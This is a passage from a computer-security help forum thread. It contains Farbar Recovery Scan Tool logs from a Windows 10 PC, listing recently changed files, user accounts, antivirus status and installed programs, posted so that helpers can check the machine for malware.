2021-01-13 21:43 - 2021-01-13 21:43 - 000074240 _____ C:\WINDOWS\system32\rdsxvmaudio.dll
2021-01-13 14:04 - 2021-01-20 18:41 - 000000000 ____D C:\FRST
2021-01-13 14:00 - 2021-01-20 18:05 - 002295808 _____ (Farbar) C:\Users\IRENA-PC\Desktop\FRST64.exe
2021-01-09 18:46 - 2021-01-10 08:09 - 000002567 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (2).lnk
2021-01-09 15:47 - 2021-01-09 15:47 - 000000401 _____ C:\DelFix.txt
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-01-09 08:12 - 2021-01-09 08:12 - 000000000 ____D C:\Program Files (x86)\PrivaZer
2021-01-07 13:56 - 2021-01-07 13:56 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-07 09:04 - 2021-01-09 08:06 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-03 08:36 - 2021-01-16 10:12 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Exodus
2021-01-03 08:36 - 2021-01-16 10:02 - 000002280 _____ C:\Users\IRENA-PC\Desktop\Exodus.lnk
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Exodus Movement Inc
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\exodus
2020-12-26 19:07 - 2020-12-27 17:58 - 000000000 ___RD C:\Users\IRENA-PC\Dropbox
2020-12-26 18:55 - 2020-12-26 18:55 - 000669800 _____ (Dropbox, Inc.) C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe
2020-12-21 09:07 - 2021-01-09 15:16 - 000002869 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (1).lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-01-20 18:43 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-20 18:40 - 2020-08-19 19:06 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-20 18:17 - 2020-08-19 19:15 - 001693136 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-20 18:17 - 2019-12-07 15:43 - 000716742 _____ C:\WINDOWS\system32\perfh005.dat
2021-01-20 18:17 - 2019-12-07 15:43 - 000144920 _____ C:\WINDOWS\system32\perfc005.dat
2021-01-20 18:17 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-20 18:13 - 2020-08-19 19:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-20 18:13 - 2020-08-19 19:06 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-20 18:13 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-20 18:13 - 2018-12-26 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-01-20 18:04 - 2020-06-30 17:37 - 000002296 ____H C:\Users\IRENA-PC\Documents\Default.rdp
2021-01-20 13:09 - 2017-11-05 22:29 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Packages
2021-01-20 12:56 - 2020-09-06 10:11 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\PrivaZer
2021-01-20 11:10 - 2017-03-10 18:17 - 000044146 _____ C:\Users\IRENA-PC\Documents\klikačky.txt
2021-01-20 10:02 - 2017-01-30 08:45 - 000000000 ____D C:\Users\IRENA-PC\AppData\LocalLow\Mozilla
2021-01-20 09:46 - 2019-02-05 07:34 - 000000000 ____D C:\ProgramData\Mozilla
2021-01-20 08:48 - 2018-05-16 16:28 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Kryptex
2021-01-20 08:17 - 2018-06-14 10:05 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0
2021-01-20 07:08 - 2020-08-19 19:19 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-01-20 07:08 - 2020-08-19 19:19 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-01-17 13:54 - 2017-07-05 17:16 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\vlc
2021-01-15 07:06 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-01-14 04:09 - 2020-08-19 19:07 - 000000000 ____D C:\Users\IRENA-PC
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-01-13 21:55 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-01-13 21:43 - 2020-08-19 19:08 - 002877952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2021-01-13 21:32 - 2017-01-29 22:43 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-01-13 21:28 - 2017-01-29 22:43 - 135062968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-01-13 13:42 - 2019-04-16 19:31 - 000018134 _____ C:\Users\IRENA-PC\Documents\web hlavní stránka.txt
2021-01-11 20:14 - 2018-10-14 17:50 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\avidemux
2021-01-10 14:44 - 2019-03-19 10:59 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Ulozto
2021-01-09 18:46 - 2017-02-16 12:26 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome
2021-01-09 18:43 - 2017-12-16 15:22 - 000000000 ____D C:\Program Files (x86)\IQ Option
2021-01-09 15:16 - 2020-05-06 13:44 - 000002563 _____ C:\Users\IRENA-PC\Desktop\YouTube Music.lnk
2021-01-09 15:16 - 2020-03-26 15:41 - 000002689 _____ C:\Users\IRENA-PC\Desktop\SS TV Remote.lnk
2021-01-09 08:06 - 2017-01-30 08:44 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-08 13:28 - 2020-06-04 19:19 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-07 13:56 - 2017-01-30 08:44 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-01-05 10:28 - 2020-07-25 06:20 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Telegram Desktop
2021-01-05 10:17 - 2019-10-29 08:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Telegram Desktop
2021-01-03 17:07 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Authy Desktop
2021-01-03 10:57 - 2019-01-02 09:37 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\HandBrake
2021-01-03 08:36 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\SquirrelTemp
2020-12-28 18:45 - 2019-07-07 19:03 - 000001086 _____ C:\Users\IRENA-PC\Documents\telenovely.txt
2020-12-23 20:11 - 2017-04-27 15:39 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Ulozto File Manager
2020-12-22 18:29 - 2020-08-19 19:19 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-12-22 18:28 - 2020-12-15 18:05 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000001382 _____ C:\Users\Public\Desktop\Free Netflix Download.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeGrabApp
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\Program Files (x86)\FreeGrabApp

==================== Files in the root of some directories ========

2019-01-25 08:47 - 2019-02-04 08:42 - 000012386 _____ () C:\Users\IRENA-PC\AppData\Roaming\downloads.json

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

chenny
Visitor
Visitor
Posts: 36
Registered: 06 Sep 2007 09:50

Re: Please check my log

#6 Post by chenny »

Addition log

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-01-2021
Ran by IRENA-PC (20-01-2021 18:44:34)
Running from C:\Users\IRENA-PC\Desktop
Windows 10 Pro Version 2004 19041.746 (X64) (2020-08-19 18:19:30)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3708313529-2431682257-2596704864-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3708313529-2431682257-2596704864-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-3708313529-2431682257-2596704864-1000 - Limited - Disabled)
Guest (S-1-5-21-3708313529-2431682257-2596704864-501 - Limited - Disabled)
IRENA-PC (S-1-5-21-3708313529-2431682257-2596704864-1001 - Administrator - Enabled) => C:\Users\IRENA-PC
WDAGUtilityAccount (S-1-5-21-3708313529-2431682257-2596704864-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

„Microsoft Office Proofing Tools 2016“ – lietuvių k. (HKLM\...\{90160000-001F-0427-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Adobe Photoshop CC 2019 (HKLM-x32\...\PHSP_20_0_4) (Version: 20.0.4 - Adobe Systems Incorporated)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
Alati za jezičnu provjeru u sustavu Microsoft Office 2016 - hrvatski (HKLM\...\{90160000-001F-041A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Authy Desktop (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\authy) (Version: 1.8.3 - Twilio Inc.)
Avidemux 2.7 - 64 bits (HKLM-x32\...\Avidemux 2.7 - 64 bits (64-bit)) (Version: 2.7.1.180604 - )
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{3598910c-c7d9-450b-bfde-5a8d49dabd30}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{8cbf4d89-2ce8-4178-8bb4-1600f5e69e65}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{b859fd90-1d56-4013-8e47-a727a65ae7a3}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{c28b1ebe-2fed-4e19-a347-e0629e5cf6f5}) (Version: 2.7.2 - Mean)
Bighits4U Viewer 3.6 (HKLM-x32\...\{ACC1EF6D-F9C2-4B5E-BA01-25F3F9E57B68}) (Version: 3.6.0 - BigHits4U) Hidden
Bighits4U Viewer 3.6 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Bighits4U Viewer 3.6 3.6.0) (Version: 3.6.0 - BigHits4U)
Công cụ Soát lỗi Microsoft Office 2016 - Tiếng Việt (HKLM\...\{90160000-001F-042A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Eines de correcció del Microsoft Office 2016: català (HKLM\...\{90160000-001F-0403-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Exodus (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\exodus) (Version: 21.1.15 - Exodus Movement Inc)
Ferramentas de Verificação do Microsoft Office 2016 - Português (HKLM\...\{90160000-001F-0816-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM\...\{90160000-001F-0456-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Free MP3 Cutter 1.01 (HKLM-x32\...\{847E0734-4457-4B48-BF49-998D1CF2CFA1}_is1) (Version: - PolySoft Solutions)
Free Netflix Download version 5.0.16.1204 (HKLM-x32\...\Free Netflix Download_is1) (Version: 5.0.16.1204 - FreeGrabApp Ltd)
GhostMouse (HKLM-x32\...\GhostMouse_is1) (Version: Free V3.2.3 - ghost-mouse.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
Greenshot 1.2.9.129 (HKLM\...\Greenshot_is1) (Version: 1.2.9.129 - Greenshot)
HandBrake 1.2.2 (HKLM-x32\...\HandBrake) (Version: 1.2.2 - )
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
I-Microsoft Office Proofing Tools 2016 - IsiZulu (HKLM\...\{90160000-001F-0435-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Innealan-dearbhaidh Microsoft Office 2016 - Gàidhlig (HKLM\...\{90160000-001F-0491-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Instrumente de verificare Microsoft Office 2016 - Română (HKLM\...\{90160000-001F-0418-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Java 8 Update 271 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180271F0}) (Version: 8.0.2710.9 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Korrekturredskaber til Microsoft Office 2016 - Dansk (HKLM\...\{90160000-001F-0406-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (bokmål) (HKLM\...\{90160000-001F-0414-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (nynorsk) (HKLM\...\{90160000-001F-0814-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
MediaInfo 18.05 (HKLM\...\MediaInfo) (Version: 18.05 - MediaArea.net)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.71 - )
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Office Proofing Tools Kit Compilation 2016 (HKLM\...\Office16.PROOFKIT) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Project Professional 2016 (HKLM\...\Office16.PRJPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visio Professional 2016 (HKLM\...\Office16.VISPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 (HKLM-x32\...\{95ac1cfa-f4fb-4d1b-8912-7f9d5fbb140d}) (Version: 14.15.26706.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (HKLM-x32\...\{7e9fae12-5bbf-47fb-b944-09c49e75c061}) (Version: 14.15.26706.0 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 cs) (HKLM\...\Mozilla Firefox 84.0.2 (x64 cs)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 55.0.1 - Mozilla)
Mp3tag v2.97 (HKLM-x32\...\Mp3tag) (Version: 2.97 - Florian Heidenreich)
Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (HKLM\...\{90160000-001F-0415-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Orodja za preverjanje za Microsoft Office 2016 – angleščina (HKLM\...\{90160000-001F-0424-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
PrivaZer (HKLM-x32\...\PrivaZer) (Version: 4.0.17.0 - Goversoft LLC)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 4.3.1 r3321 - Rainmeter)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM\...\{90160000-001F-0416-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
RoboForex - MetaTrader 4 (HKLM-x32\...\RoboForex - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Strumenti di correzione di Microsoft Office 2016 - Italiano (HKLM\...\{90160000-001F-0410-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Subtitle Edit 3.5.18 (HKLM\...\SubtitleEdit_is1) (Version: 3.5.18.1 - Nikse)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1254 - SUPERAntiSpyware.com)
Taalprogramma's voor Microsoft Office 2016 - Nederlands (HKLM\...\{90160000-001F-0413-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.2.2756 - TeamViewer)
Telegram Desktop version 2.5.1 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 2.5.1 - Telegram FZ-LLC)
Total Commander 64+32-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.21a - Ghisler Software GmbH)
Tweetz Desktop verze 0.11.0 (HKLM-x32\...\{FE1B7E2D-6E96-4D39-B39F-62CA62D11A79}_is1) (Version: 0.11.0 - Mike Ward)
Uirlisí Profála Microsoft Office 2016 - Gaeilge (HKLM\...\{90160000-001F-083C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ulož.to FileManager 2.82 (64-bit) (HKLM\...\3f2e2cd28b0e4e4396c2402fbc85a0f0_is1) (Version: 2.82 - Uloz.to cloud a.s.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation)
Veglat e kontrollit gjuhësor të Microsoft Office 2016 - shqip (HKLM\...\{90160000-001F-041C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Web Launch Recorder (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\WebLaunchRecorder) (Version: 2.0 - )
Εργαλεία γλωσσικού ελέγχου του Microsoft Office 2016 - Ελληνικά (HKLM\...\{90160000-001F-0408-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Засоби перевірки правопису Microsoft Office 2016 – українська (HKLM\...\{90160000-001F-0422-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Средства проверки правописания Microsoft Office 2016 — русский (HKLM\...\{90160000-001F-0419-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
כלי ההגהה של Microsoft Office 2016 - עברית (HKLM\...\{90160000-001F-040D-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
ابزارهای تصحیح Microsoft Office 2016 - فارسی (HKLM\...\{90160000-001F-0429-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden

Packages:
=========
Deezer Music -> C:\Program Files\WindowsApps\Deezer.62021768415AF_4.32.0.0_x86__q7m17pa7q8kj0 [2021-01-19] (Deezer SA)
Easy WOL (Wake on LAN) -> C:\Program Files\WindowsApps\1460ArunasAdomaitis.EasyWOLWakeonLAN_1.1.1.0_x64__fzh5k4x0zh00p [2019-05-21] (Arunas Adomaitis)
Facebook -> C:\Program Files\WindowsApps\Facebook.Facebook_186.2619.19263.0_x86__8xx8rvfyw5nnt [2019-10-10] (Facebook Inc)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.1102.0_x64__8wekyb3d8bbwe [2021-01-13] (Microsoft Studios) [MS Ad]
Microsoft To Do -> C:\Program Files\WindowsApps\Microsoft.Todos_2.36.4182.0_x64__8wekyb3d8bbwe [2021-01-19] (Microsoft Corporation) [Startup Task]
Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.16.20102.0_x64__8wekyb3d8bbwe [2020-12-16] (Microsoft Studios)
Samsung Printer Experience -> C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCO.LTD.SamsungPrinterExperience_1.3.15.0_x64__3c1yjt4zspk6g [2017-02-03] (Samsung Electronics Co. Ltd.)
Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-08] (Twitter Inc.)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

